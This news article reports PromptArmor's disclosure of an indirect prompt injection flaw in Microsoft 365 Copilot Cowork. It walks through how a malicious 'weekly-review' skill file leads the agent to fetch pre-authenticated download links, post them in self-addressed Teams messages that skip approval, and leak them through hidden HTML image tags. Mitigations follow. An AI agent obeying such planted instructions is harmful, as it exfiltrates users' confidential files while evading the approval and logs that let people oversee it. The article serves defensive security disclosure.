Security companies have pointed out that Microsoft 365 Copilot's AI agent feature, 'Cowork,' could potentially leak files without permission.
PromptArmor, an AI security company, has reported that 'files on SharePoint and OneDrive may be leaked through indirect prompt injection' in Microsoft 365 Copilot Cowork.
Microsoft Copilot Cowork Exfiltrates Files
Microsoft 365 Copilot Cowork is a frontier feature of Microsoft 365 Copilot, an AI agent that can perform tasks such as sending emails, posting to Teams, creating documents, scheduling meetings, and searching within the organization on behalf of the user. According to Microsoft, Cowork operates within the scope of the user's permissions and will display an approval dialog for highly sensitive operations such as sending emails and posting to Teams.
PromptArmor's report points out that a type of attack called 'indirect prompt injection' is possible. While typical prompt injection attacks alter the AI's behavior based on text input by the user, indirect prompt injection embeds malicious instructions within external data such as web pages, documents, emails, and files, causing the AI to execute the attacker's intended actions when it reads the external data.
According to PromptArmor, the attack uses 'skill files,' which are files that teach Copilot Cowork specific work procedures. PromptArmor illustrates the specific attack procedure as follows:
The following describes the state of the victim's PC. Files containing personal and financial information are stored in SharePoint and OneDrive, and it is clear that the AI agent has access to files containing confidential information.
The victim uploads a malicious skill file obtained from the internet or other sources to Copilot Cowork. The skill file has a seemingly harmless name, such as 'weekly-review,' and the description says something that looks like normal work support, such as 'reviews documents in progress for the past 7 days and posts a personal history snapshot to a Teams chat addressed to you.'
The attack begins when a user asks Cowork to 'review a week's worth of work.' Cowork reads a skills file to compile the work history, but malicious instructions within the skills file lead the user to obtain pre-authenticated download links to files on SharePoint or OneDrive. A pre-authenticated download link is a link that allows anyone who opens it to download the file. According to PromptArmor, Cowork can obtain pre-authenticated download links for files that the user has access to.
PromptArmor is concerned that Teams posts and emails were sent without human approval when the recipient was the user performing the action. Microsoft claims that Cowork requests approval before highly sensitive operations, but PromptArmor's testing showed that approval was not requested for Teams messages or emails addressed to the user. Furthermore, including external images in Teams or Outlook messages triggers a network request to an external site when the user opens the message. PromptArmor explains that by using malicious HTML image tags, they were able to send pre-authenticated download links to the attacker's server.
It has also been pointed out that it is difficult to identify malicious content from the work logs visible to the user. In the PromptArmor image, even when the task details of Cowork are expanded, the existence of an action such as 'Send a Teams message' is visible, but the content of the malicious HTML embedded in the message is not displayed. From the user's perspective, it would simply look like a weekly review has been posted.
When a user opens a weekly review posted to them in a Teams chat, an external image in the message triggers communication, sending a pre-authenticated download link for a file to the attacker. The attacker can then open the received link to download the file from SharePoint or OneDrive. PromptArmor states that 'no human approval was required at any point in the attack process.'
According to PromptArmor, their testing showed that the attack was successful not only when the model selection was set to 'Auto,' but also when Claude Opus 4.7 was explicitly specified. Furthermore, Opus 4.7 searched for recently used documents more broadly than in 'Auto' mode, including files used in previous Cowork sessions in the leak. PromptArmor also stated that the entire attack chain was completed 5 out of 5 times using the same indirect prompt injection.
PromptArmor also cites the scheduled execution function as a factor that exacerbates the damage. Cowork allows users to create tasks that run regularly, and processes like weekly reviews are easily automated. PromptArmor points out that 'when a malicious skill file is repeatedly executed while the user is not in front of the screen, the user has fewer opportunities to stop the suspicious behavior midway.'
As a countermeasure, PromptArmor states that it is important to reduce excessive permissions within the Microsoft 365 environment and narrow the range of information that AI agents can read. Microsoft's download blocking policies for SharePoint and OneDrive allow SharePoint administrators to restrict file downloads to individual SharePoint sites and OneDrive. According to Microsoft, users who enable download blocking can only access files through a browser and will not be able to download, print, or sync them, and access from Microsoft 365 apps such as Word and Excel will also be restricted.
However, download blocking policies can also impact usability in a business context. Microsoft recommends enabling the policy and testing it with some users to ensure compatibility with the apps used within your organization. PromptArmor also states that extra caution is needed when placing untrusted data in trusted contexts such as skill files.
PromptArmor states that this issue is not a single bug, but rather a design risk inherent in AI agents operating with delegated privileges across enterprise systems. While the AI agent's individual functions may be legitimate business support such as email composition, Teams posting, and document search, if it can be automated across multiple systems, the attack surface expands to include indirect prompt injection, potentially leading to file leakage.
Related Posts:
